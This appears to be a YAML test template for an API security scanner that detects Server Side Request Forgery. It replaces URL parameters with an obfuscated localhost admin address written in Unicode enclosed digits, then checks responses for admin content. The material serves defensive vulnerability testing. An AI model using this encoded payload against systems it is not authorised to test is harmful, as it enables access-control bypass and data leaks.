id: SSRF_ON_LOCALHOST_ENCODED
info:
  name: "Sensitive localhost details exposed via replacing URI param to encoded localhost/admin due to SSRF"
  description: "The endpoint appears to be vulnerable to Server Side Request Forgery attack. The original request was replayed by replacing the URI parameter with localhost/admin in an encoded format. The application responded with 2XX success code and also gave out admin-related details." 
  details: >
            "The endpoint appears to be vulnerable to Server Side Request Forgery attack. The original request was replayed by replacing the URI parameter with localhost/admin in an encoded format. The application responded with 2XX success code and also gave out admin-related details.
            Modern concepts in application development make SSRF more common and more dangerous.
            More common - the following concepts encourage developers to access an external resource based on user input: Webhooks, file fetching from URLs, custom SSO, and URL previews.
            More dangerous - Modern technologies like cloud providers, Kubernetes, and Docker expose management and control channels over HTTP on predictable, well-known paths. Those channels are an easy target for an SSRF attack.
            It is also more challenging to limit outbound traffic from your application, because of the connected nature of modern applications.
            The SSRF risk can not always be completely eliminated. While choosing a protection mechanism, it is important to consider the business risks and needs."
  impact: "Successful exploitation can lead to access control bypass, sensitive data leak, or even compromise the application."
  category:
    name: SSRF
    shortName: Server Side Request Forgery
    displayName: Server Side Request Forgery (SSRF)
  subCategory: SSRF_ON_LOCALHOST_ENCODED
  severity: HIGH
  tags:
    - Business logic
    - OWASP top 10
    - HackerOne top 10
api_selection_filters:
  response_code:
    and:
      gte: 200
      lt: 205
  or:
    - request_payload:
        for_one:
          value:
            contains_either:
                - http
          key:
            extract: url_key
    - query_param:
        for_one:
          value:
            contains_either:
                - http
          key:
            extract: url_key

execute:
  type: single
  requests:
    - req:
        - modify_query_param:
            url_key: http://①②⑦。⓪⓪⓪。⓪⓪①/admin
        - modify_body_param:
            url_key: http://①②⑦。⓪⓪⓪。⓪⓪①/admin

validate:
  response_code:
    gte: 200
    lt: 300
  response_payload:
    contains_either:
      - "admin"
